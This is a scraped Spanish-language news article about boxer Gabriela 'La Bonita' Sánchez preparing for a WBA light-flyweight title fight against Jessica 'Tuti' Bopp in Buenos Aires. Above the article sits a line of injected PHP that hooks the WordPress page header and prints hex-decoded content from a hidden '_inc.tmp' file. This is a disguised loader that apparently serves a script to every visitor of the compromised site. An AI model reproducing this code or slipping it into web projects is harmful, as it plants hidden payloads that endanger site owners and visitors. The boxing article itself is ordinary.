if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “La Bonita” Sánchez va por el campeonato minimosca de la AMB – La Opinión Universitaria La Opinión Universitaria
Menu

“La Bonita” Sánchez va por el campeonato minimosca de la AMB

 

*Primera poblana que el 15 de junio contenderá por el cetro mundial de la Asociación Mundial de Boxeo

 

Gabriela “La Bonita” Sánchez, se declara lista para su pelea del próximo sábado 15 de junio en Buenos Aires, Argentina, donde enfrentará a la pugilista local Jessica “Tuti” Bopp por el título minimosca de la Asociación Mundial de Boxeo (AMB).

“Ya estamos muy contentos y ansiosos de llegar a Argentina para poner en alto el nombre de Puebla y México”, dijo la pugilista que hará historia al ser la primera poblana que peleará por el un título de la AMB, y quien previo a su viaje al país sudamericano, visitó a la diputada Yadira Lira Navarro, para agradecer el apoyo brindado por la Presidenta de la Comisión de Juventud y Deporte del Congreso del Estado de Puebla.

Sánchez Saavedra de 24 años de edad, mencionó que llegar a la pelea por el título mundial no fue fácil, pues tuvo peleas con chicas muy fuertes, rivales de la talla de la hermana de la “Barbie” Juárez, además de boxeadoras invictas como Paulette Valenzuela y Jacky Calvo.

“Gracias a esas peleas que gané me posicioné en el número 5 a nivel nacional y a nivel mundial en el 11, entonces me dieron la oportunidad de ir a pelear a Argentina con la campeona Jessica ‘Tuti’ Bopp por el cinturón de la Asociación Mundial de Boxeo”.

De su rival, Gabriela señaló que pese a tener menor estatura, no se confía, y por el contrario, su preparación ha sido muy fuerte para enfrentar a la hasta ahora mejor pugilista del mundo en su categoría.

“Sabemos que es un poco más baja de estatura, pero ya la hemos visto entrenando o en sus peleas, es muy aguerrida, va para adelante, avienta muchos volados y se mueve mucho en el ring, entonces nosotros estamos haciendo esa estrategia de movernos bastante, de no meternos tanto a la pelea, porque sabemos que es muy fuerte y para que no nos vaya a dar un golpe de sorpresa vamos a movernos mucho, cabeceos, y tener nuestra guardia bien puesta”, explicó.

“También hemos tratado la preparación mental, he trabajado bastante, es importante que me sienta segura y este al cien con mis entrenamientos”, puntualizo Gabriela Sánchez Saavedra, que tiene como coach a Sergio Niño, al sensei Cesar Xomel y como preparador físico a Ricardo González.

 

 

 

 

  • No comments

    Deja una respuesta

    Tweets recientes